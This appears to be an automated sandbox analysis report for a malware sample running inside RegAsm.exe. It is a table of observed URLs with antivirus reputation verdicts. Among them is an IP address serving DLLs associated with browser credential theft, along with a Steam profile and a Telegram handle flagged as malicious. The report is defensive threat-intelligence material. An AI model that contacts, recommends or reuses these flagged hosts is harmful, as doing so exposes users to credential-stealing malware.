https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://95.217.240.101/freebl3.dll | 100% | Avira URL Cloud | malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR | 0% | Avira URL Cloud | safe
https://95.217.240.101/nss3.dll | 100% | Avira URL Cloud | malware
https://store.steampowered.com/news/ | 0% | URL Reputation | safe
https://steamcommunity.com/?subsection=broadcasts | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6& | 0% | Avira URL Cloud | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en | 0% | URL Reputation | safe
https://store.steampowered.com/stats/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | URL Reputation | safe
https://store.steampowered.com/steam_refunds/ | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://store.steampowered.com/legal/ | 0% | URL Reputation | safe
http://www.sqlite.org/copyright.html. | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl | 0% | URL Reputation | safe
https://95.217.240.101/sqlx.dll | 100% | Sophos S4 | malware repository uri
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en | 0% | Avira URL Cloud | safe
https://store.steampowered.com/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | 0% | URL Reputation | safe
https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322 | 0% | Avira URL Cloud | safe
https://95.217.240.101/softokn3.dlleS | 100% | Avira URL Cloud | malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://store.st | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh | 0% | URL Reputation | safe
https://95.217.240.101/softokn3.dll | 100% | Avira URL Cloud | malware
https://www.valvesoftware.com/en/contact?contact-person=Translation%2 | 0% | Avira URL Cloud | safe
https://95.217.240.101/msvcp140.dllsS9 | 100% | Avira URL Cloud | malware
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english | 0% | Avira URL Cloud | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english | 0% | URL Reputation | safe
http://store.steampowered.com/account/cookiepreferences/ | 0% | URL Reputation | safe
https://store.steampowered.com/mobile | 0% | URL Reputation | safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | 0% | Avira URL Cloud | safe
https://95.217.240.101/freebl3.dllwT= | 100% | Avira URL Cloud | malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477 | 0% | Avira URL Cloud | safe
https://steamcommunity.com/my/wishlist/ | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&a | 0% | Avira URL Cloud | safe
https://95.217.240.101 | 100% | Avira URL Cloud | malware
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis | 0% | Avira URL Cloud | safe
https://steamcommunity.com/market/ | 0% | Avira URL Cloud | safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | 0% | Avira URL Cloud | safe
https://95.217.240.101/msvcp140.dll | 100% | Avira URL Cloud | malware
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 0% | Avira URL Cloud | safe
https://steamcommunity.com/tIP | 0% | Avira URL Cloud | safe
https://95.217.240.101/D | 100% | Avira URL Cloud | malware
https://steamcommunity.com/discussions/ | 0% | Avira URL Cloud | safe
https://t.me/k0mono | 100% | Avira URL Cloud | malware
https://steamcommunity.com/workshop/ | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199686524322/inventory/ | 100% | Avira URL Cloud | malware
https://steamcommunity.com/profiles/76561199686524322/badges | 100% | Avira URL Cloud | malware
https://95.217.240.101/O | 100% | Avira URL Cloud | malware
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e | 0% | Avira URL Cloud | safe
https://95.217.240.101KEG | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=e | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUz | 0% | Avira URL Cloud | safe
https://95.217.240.101/sqlx.dll | 100% | Avira URL Cloud | malware
https://95.217.240.101/mozglue.dll | 100% | Avira URL Cloud | malware
https://95.217.240.101/sqlx.dllI | 100% | Avira URL Cloud | malware
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199686524322 | 100% | Avira URL Cloud | malware
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 0% | Avira URL Cloud | safe
https://95.217.240.101/msvcp140.dllyS# | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.42.29 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://95.217.240.101/nss3.dll | true | Avira URL Cloud: malware | unknown
https://95.217.240.101/freebl3.dll | true | Avira URL Cloud: malware | unknown
https://95.217.240.101/softokn3.dll | true | Avira URL Cloud: malware | unknown
https://95.217.240.101/msvcp140.dll | false | Avira URL Cloud: malware | unknown
https://95.217.240.101/mozglue.dll | false | Avira URL Cloud: malware | unknown
https://95.217.240.101/sqlx.dll | true | Sophos S4: malware repository uri; Avira URL Cloud: malware | unknown
https://steamcommunity.com/profiles/76561199686524322 | true | Avira URL Cloud: malware | unknown
https://95.217.240.101/vcruntime140.dll | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | HIEBAK.2.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | HIEBAK.2.dr | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/?subsection=broadcasts | RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | Avira URL Cloud: safe | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.dr | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/subscriber_agreement/ | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | URL Reputation: safe | unknown
http://www.valvesoftware.com/legal.htm | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | URL Reputation: safe | unknown
https://95.217.240.101IDH | RegAsm.exe, 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | Avira URL Cloud: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | Avira URL Cloud: safe | unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6& | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false | Avira URL Cloud: safe | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr | false |
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=englishRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=enRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://mozilla.org0/freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119968652432276561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%2RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://95.217.240.101/softokn3.dlleSRegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://store.stRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/points/shop/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.ecosia.org/newtab/HIEBAK.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKJKJJJ.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://95.217.240.101/msvcp140.dllsS9RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLKJKJJJ.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://95.217.240.101/freebl3.dllwT=RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/about/76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://help.steampowered.com/en/RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/market/RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/news/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiGCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://95.217.240.10176561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&aRegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://steamcommunity.com/tIPRegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=HIEBAK.2.drfalse
                    • URL Reputation: safe
                    unknown
                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/discussions/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/stats/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchHIEBAK.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://t.me/k0monofile.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://95.217.240.101/DRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/profiles/76561199686524322/inventory/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/profiles/76561199686524322/badgesRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/workshop/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://95.217.240.101/ORegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=eRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.2647482481.000000001B6CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://95.217.240.101KEGRegAsm.exe, 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUzRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoHIEBAK.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
